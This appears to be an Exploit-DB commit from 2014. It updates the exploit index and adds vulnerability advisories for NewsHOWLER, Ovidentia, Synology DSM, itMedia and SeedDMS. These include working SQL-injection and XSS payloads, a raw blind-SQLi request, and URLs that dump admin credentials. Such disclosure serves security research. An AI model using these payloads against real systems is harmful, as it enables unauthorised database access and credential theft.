Updated 03_16_2014

Author: Offensive Security

files.csv

@@ -9218,7 +9218,7 @@ id,file,description,date,author,platform,type,port
 9826,platforms/php/webapps/9826.txt,"MindSculpt CMS SQL Injection",2009-09-24,kaMitEz,php,webapps,0
 9827,platforms/multiple/webapps/9827.py,"html2ps 1.0 beta5 file disclosure",2009-09-24,epiphant,multiple,webapps,0
 9828,platforms/php/webapps/9828.txt,"OSSIM 2.1 - SQL Injection and xss",2009-09-23,"Alexey Sintsov",php,webapps,0
-9829,platforms/multiple/remote/9829.txt,"nginx 0.7.61 WebDAV directory traversal",2009-09-23,kingcope,multiple,remote,80
+9829,platforms/multiple/remote/9829.txt,"nginx 0.7.61 - WebDAV Directory Traversal",2009-09-23,kingcope,multiple,remote,80
 9830,platforms/php/webapps/9830.txt,"Cour Supreme SQL Injection",2009-09-23,"CrAzY CrAcKeR",php,webapps,0
 9831,platforms/windows/local/9831.txt,"Avast Antivirus 4.8.1351.0 DoS and Privilege Escalation",2009-09-23,Evilcry,windows,local,0
 9832,platforms/php/webapps/9832.txt,"Joomla/Mambo Tupinambis SQL Injection",2009-09-22,"Don Tukulesto",php,webapps,0
@@ -9282,7 +9282,7 @@ id,file,description,date,author,platform,type,port
 9897,platforms/php/webapps/9897.txt,"Mongoose Web Server 2.8.0 Source Disclosure",2009-10-23,Dr_IDE,php,webapps,0
 9898,platforms/multiple/webapps/9898.txt,"Mura CMS 5.1 Root folder disclosure",2009-10-29,"Vladimir Vorontsov",multiple,webapps,0
 9900,platforms/windows/remote/9900.txt,"NaviCOPA <= 3.0.1.2 Source Disclosure",2009-10-14,Dr_IDE,windows,remote,0
-9901,platforms/linux/dos/9901.txt,"nginx 0.7.0-0.7.61, 0.6.0-0.6.38, 0.5.0-0.5.37, 0.4.0-0.4.14 PoC",2009-10-23,"Zeus Penguin",linux,dos,80
+9901,platforms/linux/dos/9901.txt,"nginx 0.7.0-0.7.61, 0.6.0-0.6.38, 0.5.0-0.5.37, 0.4.0-0.4.14 - PoC",2009-10-23,"Zeus Penguin",linux,dos,80
 9902,platforms/windows/remote/9902.txt,"Novell eDirectory 8.8sp5 BoF",2009-10-26,"karak0rsan, murderkey",windows,remote,80
 9903,platforms/php/webapps/9903.txt,"OpenDocMan 1.2.5 xss, SQL injection",2009-10-20,"Amol Naik",php,webapps,0
 9904,platforms/asp/webapps/9904.txt,"PSArt 1.2 - SQL Injection Vulnerability",2009-10-30,"Securitylab Research",asp,webapps,0
@@ -11650,7 +11650,7 @@ id,file,description,date,author,platform,type,port
 12798,platforms/php/webapps/12798.txt,"Webiz - SQL Injection Vulnerability",2010-05-29,kannibal615,php,webapps,0
 12801,platforms/php/webapps/12801.txt,"Oscommerce Online Merchant 2.2 - File Disclosure And Admin ByPass",2010-05-30,Flyff666,php,webapps,0
 12803,platforms/windows/local/12803.html,"IP2location.dll 1.0.0.1 - Function Initialize() Buffer Overflow",2010-05-30,sinn3r,windows,local,0
-12804,platforms/multiple/remote/12804.txt,"nginx [engine x] http server <= 0.6.36 Path Draversal",2010-05-30,"cp77fk4r ",multiple,remote,0
+12804,platforms/multiple/remote/12804.txt,"nginx [engine x] http server <= 0.6.36 - Path Draversal",2010-05-30,"cp77fk4r ",multiple,remote,0
 12805,platforms/php/webapps/12805.txt,"Zeeways Script Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0
 12806,platforms/php/webapps/12806.txt,"CMScout (XSS/HTML Injection) Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0
 12807,platforms/php/webapps/12807.txt,"Creato Script SQL Injection Vulnerability",2010-05-30,Mr.P3rfekT,php,webapps,0
@@ -12134,10 +12134,10 @@ id,file,description,date,author,platform,type,port
 13815,platforms/asp/webapps/13815.pl,"Netvolution CMS <= 2.x SQL Injection Exploit Script",2010-06-10,"amquen and krumel",asp,webapps,0
 13816,platforms/php/webapps/13816.txt,"Miniweb 2.0 Business Portal and Social Networking Platform SQL Injection",2010-06-10,"L0rd CrusAd3r",php,webapps,0
 13817,platforms/windows/dos/13817.pl,"Adobe InDesign CS3 INDD File Handling Buffer Overflow Vulnerability",2010-06-11,LiquidWorm,windows,dos,0
-13818,platforms/windows/remote/13818.txt,"Nginx 0.8.36 Source Disclosure and DoS Vulnerabilities",2010-06-11,Dr_IDE,windows,remote,0
+13818,platforms/windows/remote/13818.txt,"Nginx 0.8.36 - Source Disclosure and DoS Vulnerabilities",2010-06-11,Dr_IDE,windows,remote,0
 13819,platforms/php/webapps/13819.txt,"E-PHP B2B Marketplace Multiple Vulns",2010-06-11,MizoZ,php,webapps,0
 13820,platforms/windows/local/13820.pl,"Power Tab Editor 1.7 (Build 80) - Buffer Overflow",2010-06-11,sud0,windows,local,0
-13822,platforms/windows/remote/13822.txt,"Nginx <= 0.7.65 / 0.8.39 (dev) Source Disclosure / Download Vulnerability",2010-06-11,"Jose A. Vazquez",windows,remote,0
+13822,platforms/windows/remote/13822.txt,"Nginx <= 0.7.65 / 0.8.39 (dev) - Source Disclosure / Download Vulnerability",2010-06-11,"Jose A. Vazquez",windows,remote,0
 13823,platforms/hardware/dos/13823.txt,"Savy Soda Documents (Mobile Office Suite) XLS Denial-of-Service",2010-06-11,"Matthew Bergin",hardware,dos,0
 13824,platforms/hardware/dos/13824.txt,"Office^2 iPhone XLS Denial-of-Service",2010-06-11,"Matthew Bergin",hardware,dos,0
 13825,platforms/hardware/dos/13825.txt,"GoodiWare GoodReader iPhone XLS Denial-of-Service",2010-06-11,"Matthew Bergin",hardware,dos,0
@@ -22091,7 +22091,7 @@ id,file,description,date,author,platform,type,port
 24964,platforms/windows/webapps/24964.txt,"Oracle WebCenter Sites Satellite Server - HTTP Header Injection",2013-04-18,"SEC Consult",windows,webapps,0
 24965,platforms/php/webapps/24965.txt,"KrisonAV CMS 3.0.1 - Multiple Vulnerabilities",2013-04-18,"High-Tech Bridge SA",php,webapps,0
 24966,platforms/windows/dos/24966.txt,"Java Web Start Launcher ActiveX Control - Memory Corruption",2013-04-18,"SEC Consult",windows,dos,0
-24967,platforms/multiple/webapps/24967.txt,"nginx 0.6.x Arbitrary Code Execution NullByte Injection",2013-04-19,"Neal Poole",multiple,webapps,0
+24967,platforms/multiple/webapps/24967.txt,"nginx 0.6.x - Arbitrary Code Execution NullByte Injection",2013-04-19,"Neal Poole",multiple,webapps,0
 24968,platforms/windows/dos/24968.rb,"Mikrotik Syslog Server for Windows 1.15 - Denial of Service",2013-04-22,xis_one,windows,dos,514
 24969,platforms/php/webapps/24969.txt,"CiviCRM for Joomla 4.2.2 - Remote Code Injection",2013-04-22,iskorpitx,php,webapps,0
 24972,platforms/windows/dos/24972.c,"Flightgear 2.0, 2.4 - Remote Format String Exploit",2013-04-22,Kurono,windows,dos,0
@@ -22613,7 +22613,7 @@ id,file,description,date,author,platform,type,port
 25496,platforms/php/webapps/25496.txt,"php-Charts 1.0 - Code Execution Vulnerability",2013-05-17,"fizzle stick",php,webapps,0
 25497,platforms/lin_x86/shellcode/25497.c,"Linux/x86 Reverse TCP Bind Shellcode (92 bytes)",2013-05-17,"Russell Willis",lin_x86,shellcode,0
 25498,platforms/asp/webapps/25498.txt,"ASPNuke 0.80 Comments.ASP SQL Injection Vulnerability",2005-04-22,Dcrab,asp,webapps,0
-25499,platforms/linux/dos/25499.py,"nginx 1.3.9-1.4.0 DoS PoC",2013-05-17,"Mert SARICA",linux,dos,0
+25499,platforms/linux/dos/25499.py,"nginx 1.3.9-1.4.0 - DoS PoC",2013-05-17,"Mert SARICA",linux,dos,0
 25500,platforms/asp/webapps/25500.txt,"ASPNuke 0.80 Detail.ASP SQL Injection Vulnerability",2005-04-22,Dcrab,asp,webapps,0
 25501,platforms/asp/webapps/25501.txt,"ASPNuke 0.80 Profile.ASP Cross-Site Scripting Vulnerability",2005-04-22,Dcrab,asp,webapps,0
 25502,platforms/asp/webapps/25502.txt,"ASPNuke 0.80 Select.ASP Cross-Site Scripting Vulnerability",2005-04-22,Dcrab,asp,webapps,0
@@ -22883,7 +22883,7 @@ id,file,description,date,author,platform,type,port
 25772,platforms/php/webapps/25772.txt,"Qualiteam X-Cart 4.0.8 register.php mode Parameter SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0
 25773,platforms/php/webapps/25773.txt,"Qualiteam X-Cart 4.0.8 search.php mode Parameter SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0
 25774,platforms/php/webapps/25774.txt,"Qualiteam X-Cart 4.0.8 giftcert.php Multiple Parameter SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0
-25775,platforms/linux/remote/25775.rb,"Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow",2013-05-28,metasploit,linux,remote,80
+25775,platforms/linux/remote/25775.rb,"Nginx HTTP Server 1.3.9-1.4.0 - Chuncked Encoding Stack Buffer Overflow",2013-05-28,metasploit,linux,remote,80
 25776,platforms/windows/local/25776.rb,"AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass",2013-05-28,metasploit,windows,local,0
 25777,platforms/php/webapps/25777.txt,"PowerDownload 3.0.2/3.0.3 IncDir Remote File Include Vulnerability",2005-05-31,"SoulBlack Group",php,webapps,0
 25778,platforms/php/webapps/25778.txt,"Calendarix 0.8.20071118 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2005-05-31,DarkBicho,php,webapps,0
@@ -23819,7 +23819,7 @@ id,file,description,date,author,platform,type,port
 26734,platforms/php/webapps/26734.txt,"vBulletin Advanced User Tagging Mod - Stored XSS Vulnerability",2013-07-10,[]0iZy5,php,webapps,0
 26735,platforms/php/webapps/26735.txt,"vBulletin vBShout Mod - Stored XSS Vulnerability",2013-07-10,[]0iZy5,php,webapps,0
 26736,platforms/hardware/webapps/26736.txt,"Zoom X4/X5 ADSL Modem - Multiple Vulnerabilities",2013-07-10,"Kyle Lovett",hardware,webapps,0
-26737,platforms/linux/remote/26737.pl,"nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit",2013-07-11,kingcope,linux,remote,0
+26737,platforms/linux/remote/26737.pl,"nginx 1.3.9/1.4.0 x86 - Brute Force Remote Exploit",2013-07-11,kingcope,linux,remote,0
 26739,platforms/windows/remote/26739.py,"Ultra Mini HTTPD 1.21 - Stack Buffer Overflow",2013-07-11,superkojiman,windows,remote,80
 26741,platforms/linux/remote/26741.pl,"Horde IMP 2.2.x/3.2.x/4.0.x Email Attachments HTML Injection Vulnerability",2005-12-06,"SEC Consult",linux,remote,0
 26742,platforms/asp/webapps/26742.txt,"DuWare DuPortalPro 3.4.3 Password.ASP Cross-Site Scripting Vulnerability",2005-12-06,Dj_Eyes,asp,webapps,0
@@ -29046,3 +29046,8 @@ id,file,description,date,author,platform,type,port
 32268,platforms/php/webapps/32268.txt,"Freeway 1.4.1.171 templates/Freeway/boxes/loginbox.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
 32269,platforms/php/webapps/32269.txt,"Freeway 1.4.1.171 templates/Freeway/boxes/whos_online.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
 32270,platforms/php/webapps/32270.txt,"Freeway 1.4.1.171 templates/Freeway/mainpage_modules/mainpage.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
+32271,platforms/php/webapps/32271.txt,"NewsHOWLER 1.03 Cookie Data SQL Injection Vulnerability",2008-08-18,IRCRASH,php,webapps,0
+32272,platforms/php/webapps/32272.txt,"Ovidentia 6.6.5 'index.php' Cross-Site Scripting Vulnerability",2008-08-18,"ThE dE@Th",php,webapps,0
+32274,platforms/php/webapps/32274.txt,"Synology DSM 4.3-3827 (article.php) - Blind SQL Injection",2014-03-14,"Michael Wisniewski",php,webapps,80
+32275,platforms/php/webapps/32275.txt,"itMedia Multiple SQL Injection Vulnerabilities",2008-08-18,baltazar,php,webapps,0
+32276,platforms/php/webapps/32276.txt,"SeedDMS 4.3.3 - Multiple Vulnerabilities",2014-03-14,"Craig Arendt",php,webapps,80

platforms/php/webapps/32271.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/30732/info
+
+NewsHOWLER is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+javascript:document.cookie = "news_user=zz'+union+select+3,3,3,3+from+news_users/*; path=/";
+javascript:document.cookie = "news_password=3; path=/"; 

platforms/php/webapps/32272.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30735/info
+
+Ovidentia is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Ovidentia 6.6.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[path]/index.php?tg=search&pat=abcdefgh&idx=find&navpos=0&navitem=&field=<script>alert(333.45)</script> 

platforms/php/webapps/32274.txt

@@ -0,0 +1,54 @@
+~~~~~~
+Title: Synology DSM Blind SQL Injection
+Version affected: <= 4.3-3827
+Vendor: Synology
+Discovered by: Michael Wisniewski
+Status: Patched
+~~~~~~
+
+The file "/photo/include/blog/article.php" contains a Blind SQL
+Injection Vulnerability in the 'value' variable in the URL.
+
+The vendor was contacted approximately 2 weeks ago.  They reviewed the
+information and determined that it is vulnerable and a patch has been
+released.  The DSM5 official release contains this patch, which was
+released earlier this week.  An update for DSM4.x will be released
+later this month to address this issue in the 4.x line.  The vendor
+also stated that it will be fixed in the next Photo Station hotfix for
+the 4.x line.
+
+Work-around: If you don't use the blog, just rename the file.
+
+~~~~~~
+POST /photo/include/blog/article.php HTTP/1.1
+Content-Length: 59
+Content-Type: application/x-www-form-urlencoded
+X-Requested-With: XMLHttpRequest
+Referer: <ip>:80/ <http://10.0.1.15:80/>
+Cookie: PHPSESSID=<foo>; visit_day=<foo>
+Host: <foo>
+Connection: Keep-alive
+Accept-Encoding: gzip,deflate
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML,
+like Gecko) Chrome/28.0.1500.63 Safari/537.36
+Accept: */*
+
+list_type=label&value=1%20AND%203*2*1%3d6%20AND%20812%3d812
+~~~~~~
+
+It responds with:
+
+All posts without a label
+Synology Blog
+2008-01-01 00:00:00 Published by:Synology Blog
+
+~~~~~~
+
+Timeline:
+- 3/1/14: Contacted Vendor with Details of Vulnerability and Exploit.
+- 3/2/14: Vendor responded with 'they are investigating'.
+- 3/4/14: Vendor responded with it being fixed in DSM5 and DSM4.x (4.x
+patched later in the month)
+- 3/10/14: DSM5 Released
+- 3/10/14: Contacted Vendor Final Time to make sure it's OK to release the
+information.

platforms/php/webapps/32275.txt

@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/30740/info
+
+itMedia is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/vijest.php?id=-1+union+all+select+1,concat_ws(char(58),user,pass),3,4,5,6,7+from+admin--
+
+http://www.example.com/vijesti.php?id=-1+union+all+select+1,2,concat_ws(char(58),user,pass)+from+admin--
+
+http://www.example.com/vijest.php?id=-1+union+all+select+1,2,concat_ws(char(58),user,pass),4,5,6,7,8,9,10+from+admin--
+
+http://www.example.com/galerija.php?op=slika&ids=-1+union+all+select+1,null,concat_ws(char(58),user,pass)+from+admin--
+
+http://www.example.com/galerija.php?op=slika&ids=-1+union+all+select+1,null,concat_ws(char(58),user,pass),4,5+from+admin--
+
+http://www.example.com/ponuda.php?op=slika&ids=-1+union+all+select+1,concat_ws(char(58),user,pass),3+from+admin--
+
+http://www.example.com/ponuda.php?op=kategorija&id=-1+union+all+select+1,2,concat_ws(char(58),user,pass),4+from+admin--
+
+http://www.example.com/slike.php?op=slika&ids=-1+union+all+select+1,2,concat_ws(char(58),user,pass),4,5+from+admin-- 

platforms/php/webapps/32276.txt

@@ -0,0 +1,66 @@
+Product description:
+============
+SeedDMS is the continuation of LetoDMS because it has lost its main developer. SeedDMS is an easy to use but powerful Open Source Document Management System.
+http://www.seeddms.org/index.php?id=2
+============
+
+SeedDMS Unprivileged User Remote Code Execution Vulnerability (CVE-2014-2278):
+============
+Missing Function Level Access Controls: The application will allow file uploads of any type without sufficient user access controls.
+
+Any unprivileged user, including guest users can upload arbitrary file types, including script formats that will allow remote code execution on the server.
+
+Details:
+----------------------
+The /op/op.AddFile2.php upload function is not sufficiently access controlled. The script path can be controlled using the "fileId" parameter, which will allow an attacker to control the location of files to be uploaded to the system. Using path traversal a user can traverse out of the configured upload path, and insert arbitrary files into the web root.
+
+The ?partitionIndex? parameter is used for filename/extension specification in the path.
+
+The CVE project assigned CVE-2014-2278 to this issue.
+============
+
+SeedDMS Path Traversal Vulnerability (CVE-2014-2279):
+============
+A user can use path traversal methods to return the contents of local files.
+
+To exploit this vulnerability requires privileged access to the LogManagement application functionality.
+
+Details:
+----------------------
+The /out/out.LogManagement.php script will allow local files to be retrieved from the server by path traversal using the "logname" parameter.
+
+The CVE project assigned CVE-2014-2279 to this issue.
+============
+
+SeedDMS Cross-site Scripting Vulnerability (CVE-2014-2280)
+============
+The application search feature is vulnerable to reflected cross-site scripting attacks.
+
+Details:
+----------------------
+The "query" parameter will accept scripting tags, which will be returned to the page without validation, or sanitization of HTML entities.
+
+The CVE project assigned CVE-2014-2280 to this issue.
+============
+
+Vendor Response:
+Upgrade to SeedDMS 4.3.4 or higher.
+https://sourceforge.net/projects/seeddms/files/seeddms-4.3.4/
+
+Timeline:
+============
+February 26, 2014, Vulnerability identified
+February 26, 2014, Product vendor notification
+February 26, 2014, Product vendor patch review
+February 27, 2014, Product vendor fix confirmed
+February 28, 2014, Patch released
+March 14, 2014, 2014, Disclosure
+
+Research:
+============
+Craig Arendt, Stratum Security
+http://www.stratumsecurity.com
+
+Disclaimer:
+----------------------
+The information provided in this advisory is provided as is without warranty of any kind.